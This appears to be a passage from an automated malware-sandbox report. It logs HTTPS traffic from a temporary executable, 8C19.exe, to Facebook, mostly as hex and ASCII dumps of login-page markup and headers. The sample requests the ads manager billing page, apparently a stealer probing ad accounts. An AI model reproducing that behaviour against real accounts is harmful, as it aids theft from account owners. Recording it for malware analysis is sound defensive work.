68 74 6d 6c 22 3a 22 46 72 61 6e 5c 75 30 30 65 37 61 69 73 20 28 46 72 61 6e 63 65 29 22 7d 2c 31
                                                                                                                                  Data Ascii: },1],["__markup_3310c079_0_4_Re",{"__html":"English (US)"},1],["__markup_3310c079_0_5_K1",{"__html":"Espa\u00f1ol"},1],["__markup_3310c079_0_6_x6",{"__html":"Espa\u00f1ol (Espa\u00f1a)"},1],["__markup_3310c079_0_7_IS",{"__html":"Fran\u00e7ais (France)"},1
                                                                                                                                  2022-10-17 20:07:22 UTC1565INData Raw: 39 5c 75 30 65 33 32 5c 75 30 65 34 34 5c 75 30 65 31 37 5c 75 30 65 32 32 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 72 5f 79 41 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 34 65 32 64 5c 75 36 35 38 37 28 5c 75 35 33 66 30 5c 75 37 30 36 33 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 73 5f 38 68 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 34 65 32 64 5c 75 36 35 38 37 28 5c 75 37 62 38 30 5c 75 34 66 35 33 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 74 5f 41 2b 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 34 65 32 64 5c 75 36 35 38 37 28 5c 75 39 39 39 39 5c 75 36 65 32 66 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f
                                                                                                                                  Data Ascii: 9\u0e32\u0e44\u0e17\u0e22"},1],["__markup_3310c079_0_r_yA",{"__html":"\u4e2d\u6587(\u53f0\u7063)"},1],["__markup_3310c079_0_s_8h",{"__html":"\u4e2d\u6587(\u7b80\u4f53)"},1],["__markup_3310c079_0_t_A+",{"__html":"\u4e2d\u6587(\u9999\u6e2f)"},1],["__markup_
                                                                                                                                  2022-10-17 20:07:22 UTC1566INData Raw: 5c 2f 5c 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 75 30 30 32 35 32 46 61 64 73 5c 75 30 30 32 35 32 46 6d 61 6e 61 67 65 72 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 7d 5d 5d 2c 5b 22 55 49 54 69 6e 79 56 69 65 77 70 6f 72 74 41 63 74 69 6f 6e 22 2c 22 69 6e 69 74 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 52 65 73 65 74 53 63 72 6f 6c 6c 4f 6e 55 6e 6c 6f 61 64 22 2c 22 69 6e 69 74 22 2c 5b 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 30 5f 67 6c 22 5d 2c
                                                                                                                                  Data Ascii: \/\/www.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing"}]],["UITinyViewportAction","init",[],[]],["ResetScrollOnUnload","init",["__elem_a588f507_0_0_gl"],
                                                                                                                                  2022-10-17 20:07:22 UTC1568INData Raw: 62 39 30 31 30 34 34 30 66 39 30 63 37 62 62 63 64 37 65 63 66 31 38 30 61 30 37 34 64 65 39 31 63 31 61 22 2c 22 6b 65 79 49 64 22 3a 31 39 7d 7d 5d 5d 2c 5b 22 50 6c 61 74 66 6f 72 6d 44 69 61 6c 6f 67 43 42 54 53 65 74 74 65 72 22 2c 22 73 65 74 43 42 54 49 6e 46 6f 72 6d 41 6e 64 4c 6f 67 22 2c 5b 22 5f 5f 65 6c 65 6d 5f 38 33 35 63 36 33 33 61 5f 30 5f 30 5f 32 50 22 5d 2c 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 38 33 35 63 36 33 33 61 5f 30 5f 30 5f 32 50 22 7d 2c 22 63 6c 69 65 6e 74 5f 6c 6f 67 67 65 64 5f 6f 75 74 5f 69 6e 69 74 5f 69 6d 70 72 65 73 73 69 6f 6e 22 5d 5d 2c 5b 22 42 72 6f 77 73 65 72 50 72 65 66 69 6c 6c 4c 6f 67 67 69 6e 67 22 2c 22 69 6e 69 74 43 6f 6e 74 61 63 74 70 6f 69 6e 74 46 69 65 6c 64 4c 6f 67 67 69 6e 67 22 2c
                                                                                                                                  Data Ascii: b9010440f90c7bbcd7ecf180a074de91c1a","keyId":19}}]],["PlatformDialogCBTSetter","setCBTInFormAndLog",["__elem_835c633a_0_0_2P"],[{"__m":"__elem_835c633a_0_0_2P"},"client_logged_out_init_impression"]],["BrowserPrefillLogging","initContactpointFieldLogging",
                                                                                                                                  2022-10-17 20:07:22 UTC1569INData Raw: 7a 61 69 53 63 75 62 61 5f 44 45 50 52 45 43 41 54 45 44 22 2c 22 50 61 67 65 54 72 61 6e 73 69 74 69 6f 6e 73 22 2c 22 41 6e 69 6d 61 74 69 6f 6e 22 5d 2c 22 63 73 73 22 5d 5d 2c 5b 22 54 69 6d 65 53 6c 69 63 65 49 6d 70 6c 22 5d 2c 5b 22 48 61 73 74 65 53 75 70 70 6f 72 74 44 61 74 61 22 5d 2c 5b 22 53 65 72 76 65 72 4a 53 22 5d 2c 5b 22 52 75 6e 22 5d 2c 5b 22 49 6e 69 74 69 61 6c 4a 53 4c 6f 61 64 65 72 22 5d 5d 2c 22 63 6f 6e 74 65 78 74 73 22 3a 5b 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 31 5f 41 36 22 7d 2c 74 72 75 65 5d 2c 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 32 5f 6b 7a 22 7d 2c 74 72 75 65 5d 5d 7d 29 3b 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 52 75 6e 22 5d
                                                                                                                                  Data Ascii: zaiScuba_DEPRECATED","PageTransitions","Animation"],"css"]],["TimeSliceImpl"],["HasteSupportData"],["ServerJS"],["Run"],["InitialJSLoader"]],"contexts":[[{"__m":"__elem_a588f507_0_1_A6"},true],[{"__m":"__elem_a588f507_0_2_kz"},true]]});requireLazy(["Run"]
                                                                                                                                  2022-10-17 20:07:22 UTC1571INData Raw: 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 64 2f 6c 2f 30 2c 63 72 6f 73 73 2f 44 41 54 67 4a 75 4e 70 65 41 4f 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 74 79 6c 65 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 38 2f 72 2f 5f 4c 6b 4e 5a 50 71 47 52 41 7a 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 63 72 69 70 74 22 20
                                                                                                                                  Data Ascii: load" href="https://static.xx.fbcdn.net/rsrc.php/v3/yd/l/0,cross/DATgJuNpeAO.css?_nc_x=Ij3Wp8lg5Kz" as="style" crossorigin="anonymous" /><link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/y8/r/_LkNZPqGRAz.js?_nc_x=Ij3Wp8lg5Kz" as="script"
                                                                                                                                  2022-10-17 20:07:22 UTC1572INData Raw: 2c 63 72 6f 73 73 2f 76 63 50 71 54 69 52 77 49 69 55 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 74 79 6c 65 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 73 2f 6c 2f 30 2c 63 72 6f 73 73 2f 70 50 4d 36 64 30 46 6c 62 32 57 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 74 79 6c 65 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65
                                                                                                                                  Data Ascii: ,cross/vcPqTiRwIiU.css?_nc_x=Ij3Wp8lg5Kz" as="style" crossorigin="anonymous" /><link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/ys/l/0,cross/pPM6d0Flb2W.css?_nc_x=Ij3Wp8lg5Kz" as="style" crossorigin="anonymous" /><link rel="preload" hre
                                                                                                                                  2022-10-17 20:07:22 UTC1573INData Raw: 6f 6e 73 69 73 74 65 6e 63 79 3a 7b 72 65 76 3a 31 30 30 36 34 30 32 37 31 31 7d 7d 7d 2c 61 6c 6c 52 65 73 6f 75 72 63 65 73 3a 5b 22 5a 36 4b 4e 6e 34 51 22 2c 22 68 79 4b 6d 70 75 75 22 2c 22 4b 68 62 44 71 4c 6d 22 2c 22 45 43 33 61 59 43 6f 22 2c 22 78 4e 55 41 4f 72 46 22 2c 22 6e 36 57 34 78 4d 48 22 2c 22 66 50 54 53 43 49 32 22 2c 22 2b 52 47 74 4d 30 6f 22 2c 22 76 63 42 63 4a 6a 77 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 6a 54 58 64 48 33 65 22 2c 22 6d 52 70 44 77 6d 64 22 2c 22 45 46 31 68 57 6c 35 22 2c 22 43 6f 33 6e 65 56 64 22 2c 22 4b 41 6a 62 72 6c 2f 22 2c 22 5a 45 43 34 52 72 51 22 2c 22 63 59 55 33 63 33 32 22 2c 22 41 63 6d 5a 31 35 6d 22 2c 22 73 6a 43 51 65 7a 61 22 2c 22 59 6f 32 55 7a 4f 68 22 2c 22 4a 2b 2f 67 42 78 6b 22 2c 22
                                                                                                                                  Data Ascii: onsistency:{rev:1006402711}}},allResources:["Z6KNn4Q","hyKmpuu","KhbDqLm","EC3aYCo","xNUAOrF","n6W4xMH","fPTSCI2","+RGtM0o","vcBcJjw","vGt2mxz","jTXdH3e","mRpDwmd","EF1hWl5","Co3neVd","KAjbrl/","ZEC4RrQ","cYU3c32","AcmZ15m","sjCQeza","Yo2UzOh","J+/gBxk","
                                                                                                                                  2022-10-17 20:07:22 UTC1574INData Raw: 31 31 39 32 0d 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 35 6e 51 58 75 57 53 55 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 6e 6f 77 5f 69 6e 6c 28 29 3b 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 5f 5f 62 69 67 50 69 70 65 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 62 69 67 50 69 70 65 29 7b 62 69 67 50 69 70 65 2e 62 65 66 6f 72 65 50 61 67 65 6c 65 74 41 72 72 69 76 65 28 22 6c 61 73 74 5f 72 65 73 70 6f 6e 73 65 22 2c 6e 29 3b 7d 29 7d 29 28 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 35 6e 51 58 75 57 53 55 22 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 5f 5f 62 69 67 50 69 70 65 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 62 69 67 50 69 70 65 29 7b 62 69 67 50 69 70 65 2e 6f 6e 50 61 67 65 6c 65 74 41
                                                                                                                                  Data Ascii: 1192<script nonce="5nQXuWSU">(function(){var n=now_inl();requireLazy(["__bigPipe"],function(bigPipe){bigPipe.beforePageletArrive("last_response",n);})})();</script><script nonce="5nQXuWSU">requireLazy(["__bigPipe"],(function(bigPipe){bigPipe.onPageletA
                                                                                                                                  2022-10-17 20:07:22 UTC1576INData Raw: 5f 68 7a 79 6f 67 61 68 38 48 31 56 42 33 77 75 42 78 30 69 7a 70 4e 6d 4f 66 7a 4e 75 67 58 79 70 61 7a 53 77 48 35 53 2d 55 64 55 70 41 6a 43 46 77 42 77 51 2d 50 71 4e 6a 77 4e 63 74 66 47 32 6d 74 35 53 48 4b 30 63 6b 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 30 38 33 31 31 36 22 2c 5b 22 58 41 73 79 6e 63 52 65 71 75 65 73 74 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 58 41 73 79 6e 63 52 65 71 75 65 73 74 22 2c 22 41 61 32 30 6c 69 73 66 64 5f 79 44 46 55 72 5a 5a 5f 68 7a 79 6f 67 61 68 38 48 31 56 42 33 77 75 42 78 30 69 7a 70 4e 6d 4f 66 7a 4e 75 67 58 79 70 61 7a 53 77 48 35 53 2d 55 64 55 70 41 6a 43 46 77 42 77 51 2d 50 71 4e 6a 77 4e 63 74 66 47 32 6d 74 35 53 48 4b 30 63 6b 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 30 38 33 31 31 37 22 2c 5b 5d 2c 7b
                                                                                                                                  Data Ascii: _hzyogah8H1VB3wuBx0izpNmOfzNugXypazSwH5S-UdUpAjCFwBwQ-PqNjwNctfG2mt5SHK0ck"]},-1],["cr:1083116",["XAsyncRequest"],{__rc:["XAsyncRequest","Aa20lisfd_yDFUrZZ_hzyogah8H1VB3wuBx0izpNmOfzNugXypazSwH5S-UdUpAjCFwBwQ-PqNjwNctfG2mt5SHK0ck"]},-1],["cr:1083117",[],{
                                                                                                                                  2022-10-17 20:07:22 UTC1577INData Raw: 4b 31 73 47 79 6b 70 74 72 34 41 73 36 58 6f 76 74 44 63 69 61 70 48 41 22 5d 7d 2c 2d 31 5d 2c 5b 22 42 61 6e 7a 61 69 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 4d 41 58 5f 53 49 5a 45 3a 31 30 30 30 30 2c 4d 41 58 5f 57 41 49 54 3a 31 35 30 30 30 30 2c 4d 49 4e 5f 57 41 49 54 3a 6e 75 6c 6c 2c 52 45 53 54 4f 52 45 5f 57 41 49 54 3a 31 35 30 30 30 30 2c 62 6c 61 63 6b 6c 69 73 74 3a 5b 22 74 69 6d 65 5f 73 70 65 6e 74 22 5d 2c 64 69 73 61 62 6c 65 64 3a 66 61 6c 73 65 2c 67 6b 73 3a 7b 62 6f 6f 73 74 65 64 5f 70 61 67 65 6c 69 6b 65 73 3a 74 72 75 65 2c 6d 65 72 63 75 72 79 5f 73 65 6e 64 5f 65 72 72 6f 72 5f 6c 6f 67 67 69 6e 67 3a 74 72 75 65 2c 70 6c 61 74 66 6f 72 6d 5f 6f 61 75 74 68 5f 63 6c 69 65 6e 74 5f 65 76 65 6e 74 73 3a 74 72 75 65 2c 67 72 61 70
                                                                                                                                  Data Ascii: K1sGykptr4As6XovtDciapHA"]},-1],["BanzaiConfig",[],{MAX_SIZE:10000,MAX_WAIT:150000,MIN_WAIT:null,RESTORE_WAIT:150000,blacklist:["time_spent"],disabled:false,gks:{boosted_pagelikes:true,mercury_send_error_logging:true,platform_oauth_client_events:true,grap
                                                                                                                                  2022-10-17 20:07:22 UTC1578INData Raw: 49 5f 69 70 0d 0a 31 30 61 30 0d 0a 4b 6a 2d 6d 39 74 34 71 41 53 43 65 67 45 47 6a 78 61 57 74 33 5f 6a 72 52 77 75 37 63 6f 57 51 71 4b 49 32 55 55 34 42 68 49 56 63 2d 35 46 6b 4f 77 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 39 38 33 38 34 34 22 2c 5b 5d 2c 7b 5f 5f 72 63 3a 5b 6e 75 6c 6c 2c 22 41 61 31 58 36 59 30 52 48 72 32 52 47 38 57 38 34 37 4a 6f 70 6c 56 35 78 59 65 77 57 51 36 33 78 42 48 2d 6a 37 45 52 52 74 50 31 56 6f 31 46 2d 6d 62 31 5f 75 32 56 74 4e 4b 31 73 47 79 6b 70 74 72 34 41 73 36 58 6f 76 74 44 63 69 61 70 48 41 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 33 34 34 34 38 37 22 2c 5b 22 52 65 61 63 74 44 4f 4d 46 6f 72 6b 65 64 2d 70 72 6f 64 2e 63 6c 61 73 73 69 63 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 52 65 61 63 74 44 4f 4d 46 6f 72 6b
                                                                                                                                  Data Ascii: I_ip10a0Kj-m9t4qASCegEGjxaWt3_jrRwu7coWQqKI2UU4BhIVc-5FkOw"]},-1],["cr:983844",[],{__rc:[null,"Aa1X6Y0RHr2RG8W847JoplV5xYewWQ63xBH-j7ERRtP1Vo1F-mb1_u2VtNK1sGykptr4As6XovtDciapHA"]},-1],["cr:1344487",["ReactDOMForked-prod.classic"],{__rc:["ReactDOMFork
                                                                                                                                  2022-10-17 20:07:22 UTC1580INData Raw: 77 4e 63 74 66 47 32 6d 74 35 53 48 4b 30 63 6b 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 31 38 37 31 35 39 22 2c 5b 22 42 6c 75 65 43 6f 6d 70 61 74 42 72 6f 6b 65 72 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 42 6c 75 65 43 6f 6d 70 61 74 42 72 6f 6b 65 72 22 2c 22 41 61 32 30 6c 69 73 66 64 5f 79 44 46 55 72 5a 5a 5f 68 7a 79 6f 67 61 68 38 48 31 56 42 33 77 75 42 78 30 69 7a 70 4e 6d 4f 66 7a 4e 75 67 58 79 70 61 7a 53 77 48 35 53 2d 55 64 55 70 41 6a 43 46 77 42 77 51 2d 50 71 4e 6a 77 4e 63 74 66 47 32 6d 74 35 53 48 4b 30 63 6b 22 5d 7d 2c 2d 31 5d 2c 5b 22 49 6d 6d 65 64 69 61 74 65 41 63 74 69 76 65 53 65 63 6f 6e 64 73 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 73 61 6d 70 6c 69 6e 67 5f 72 61 74 65 3a 30 7d 2c 34 32 33 5d 5d 2c 72 65 71 75 69 72 65 3a 5b 5b 22
                                                                                                                                  Data Ascii: wNctfG2mt5SHK0ck"]},-1],["cr:1187159",["BlueCompatBroker"],{__rc:["BlueCompatBroker","Aa20lisfd_yDFUrZZ_hzyogah8H1VB3wuBx0izpNmOfzNugXypazSwH5S-UdUpAjCFwBwQ-PqNjwNctfG2mt5SHK0ck"]},-1],["ImmediateActiveSecondsConfig",[],{sampling_rate:0},423]],require:[["
                                                                                                                                  2022-10-17 20:07:22 UTC1581INData Raw: 5d 5d 2c 5b 22 54 69 6d 65 53 70 65 6e 74 42 69 74 41 72 72 61 79 4c 6f 67 67 65 72 22 2c 22 69 6e 69 74 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 44 65 66 65 72 72 65 64 43 6f 6f 6b 69 65 22 2c 22 61 64 64 54 6f 51 75 65 75 65 22 2c 5b 5d 2c 5b 22 5f 6a 73 5f 64 61 74 72 22 2c 22 2d 72 56 4e 59 39 5f 52 4f 76 55 4d 72 5f 72 35 53 2d 67 77 74 37 4c 4c 22 2c 36 33 30 37 32 30 30 30 30 30 30 2c 22 2f 22 2c 74 72 75 65 2c 66 61 6c 73 65 2c 74 72 75 65 5d 5d 2c 5b 22 44 65 66 65 72 72 65 64 43 6f 6f 6b 69 65 22 2c 22 61 64 64 54 6f 51 75 65 75 65 22 2c 5b 5d 2c 5b 22 5f 6a 73 5f 73 62 22 2c 22 2d 72 56 4e 59 5f 72 71 72 53 46 31 2d 38 78 4b 57 6a 41 34 6e 55 53 62 22 2c 36 33 30 37 32 30 30 30 30 30 30 2c 22 2f 22 2c 66 61 6c 73 65 2c 66 61 6c 73 65 2c 74 72 75 65 5d
                                                                                                                                  Data Ascii: ]],["TimeSpentBitArrayLogger","init",[],[]],["DeferredCookie","addToQueue",[],["_js_datr","-rVNY9_ROvUMr_r5S-gwt7LL",63072000000,"/",true,false,true]],["DeferredCookie","addToQueue",[],["_js_sb","-rVNY_rqrSF1-8xKWjA4nUSb",63072000000,"/",false,false,true]


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  13192.168.2.54971831.13.92.36443C:\Users\user\AppData\Local\Temp\8C19.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  2022-10-17 20:07:24 UTC1624OUTGET /ads/manager/account_settings/account_billing HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                  Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                                                                  Host: www.facebook.com
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                  viewport-width: 1920
                                                                                                                                  sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"
                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                  sec-ch-prefers-color-scheme: light
                                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                                  Sec-Fetch-User: ?1
                                                                                                                                  Sec-Fetch-Dest: document
                                                                                                                                  2022-10-17 20:07:24 UTC1625INHTTP/1.1 302 Found
                                                                                                                                  Location: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing
                                                                                                                                  x-fb-rlafr: 0
                                                                                                                                  content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net facebook.com fbwifigateway.net *.fbwifigateway.net fbcdn.net cdninstagram.com *.cdninstagram.com oculuscdn.com *.oculuscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
                                                                                                                                  2022-10-17 20:07:24 UTC1626INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 3b 73 74 79 6c 65 2d 73 72 63 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 64 61 74 61 3a 20 2a 2e 66 61 63 65 62
                                                                                                                                  Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.faceb


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  14192.168.2.54971931.13.92.36443C:\Users\user\AppData\Local\Temp\8C19.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  2022-10-17 20:07:24 UTC1628OUTGET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                  Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                                                                  Host: www.facebook.com
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                  viewport-width: 1920
                                                                                                                                  sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"
                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                  sec-ch-prefers-color-scheme: light
                                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                                  Sec-Fetch-User: ?1
                                                                                                                                  Sec-Fetch-Dest: document
                                                                                                                                  2022-10-17 20:07:24 UTC1629INHTTP/1.1 200 OK
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
                                                                                                                                  x-fb-rlafr: 0
                                                                                                                                  content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
